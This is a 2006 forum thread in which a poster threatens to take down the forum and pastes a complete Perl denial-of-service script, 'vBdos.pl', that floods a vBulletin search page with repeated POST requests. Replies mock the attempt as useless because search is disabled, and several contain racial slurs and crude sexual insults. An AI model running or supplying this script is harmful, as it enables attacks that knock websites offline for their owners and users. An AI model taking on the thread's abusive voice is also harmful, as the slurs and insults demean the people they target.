Posted January 28, 200619 yr I remember this shit forum and it hasn't changed a bit now i remember i said if i find an exploit fore this forum i'm gonne take this shit down and i did. i already found one b4 but i coulden't figure out how to use it nOWH>>>>...... just to tell you its possible i'm gonne give you fuckers the exploit the forum is going down in 13:00 NL time so that will be 12:00 uk ore 14:00 i don't know in 1 hour i'm gonne fuck this shit up here is the exploit :sleep2: :sleep2: :sleep2: :sleep2: ::devil: #!/usr/bin/perl ########################################## # vBdos.pl - vBulletin <=3.5.3 Search DoS # # Written by spic of ***** ########################################## # Contact # Site: www.*****.net and www.*****-forum.net # Email: spic <at> *****.net # IRC: irc.*****.net #***** ########################################## # Example # vBdos.pl www.avbforum.com /vbulletin/ ########################################## # Partially ripped from zod32 of *****! # Sorry, zod! :( # Excuse the messy code :] ########################################## # Shoutz to # # z3r0, ArYa, uid0, zod32, kutmaster, # felosi, cijfer, wr0ck, # and the rest of the crew! ;) ########################################## use IO::Socket; $server= $ARGV[0]; $path=$ARGV[1]; while($x != 9999) { $post = "search_keywords=spic+of+*****+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; $lrg = length $post; if(!$server||!$path) { print "rn"; print "vBulletin DoS by spic of *****n"; print "usage: vBdos.pl <host without http> <directory>rn"; exit(); } my $sock = new IO::Socket::INET ( PeerAddr => "$server", PeerPort => "80", Proto => "tcp", ); die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock; print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n"; print $sock "Host: $servern"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n"; print $sock "Referer: $servern"; print $sock "Accept-Language: en-usn"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Accept-Encoding: gzip, deflaten"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.5n"; print $sock "Connection: Keep-Aliven"; print $sock "Cache-Control: no-cachen"; print $sock "Content-Length: $lrgnn"; print $sock "$postn"; close($sock); syswrite STDOUT,"."; $x++; } ##########################################
January 28, 200619 yr omg dutch hackers RUNNNNNN:nigga: PHEAR TEH DUTCH!!! FOR WE PWN YUO!!! MESS WITH US, AND WE SEND TEH BELGIUM @ J00 K!!! btw does that 'DoS' actually work, was too lazy to read the code:nigga:
January 28, 200619 yr im really sorry spic of the g00ns, but that DoS is very useless to these forums. you see, that code involves using the search tool... wait a minute whats this? the search has been disabled. GG. well he did make that DoS.
January 28, 200619 yr im really sorry spic of the *****, but that DoS is very useless to these forums. you see, that code involves using the search tool... wait a minute whats this? the search has been disabled. GG. I guess that means u fail spic of the *****.. :dunno:
January 28, 200619 yr im really sorry spic of the g00ns, but that DoS is very useless to these forums. you see, that code involves using the search tool... wait a minute whats this? the search has been disabled. GG. well he did make that DoS. Perhaps you could use it on the FAQ search thingy?:sly:
January 28, 200619 yr lloerbatioin! tits! this is funny lol everyone thinks there da 1337 haxor but they suck penis ytu :gaysex: :gaysex: :gaysex: buttfucxer!
January 28, 200619 yr heeeeelllllo thurrrr http://www.alexander-wendt.de/Bugdays2004/images/09-DragQueen1.jpg
January 30, 200619 yr AHAHAHAHAHAHAHAHAAAA ...nothing happened. Doesn't that mean your plan failed and/or was foiled?!?!?!?!? I believe so.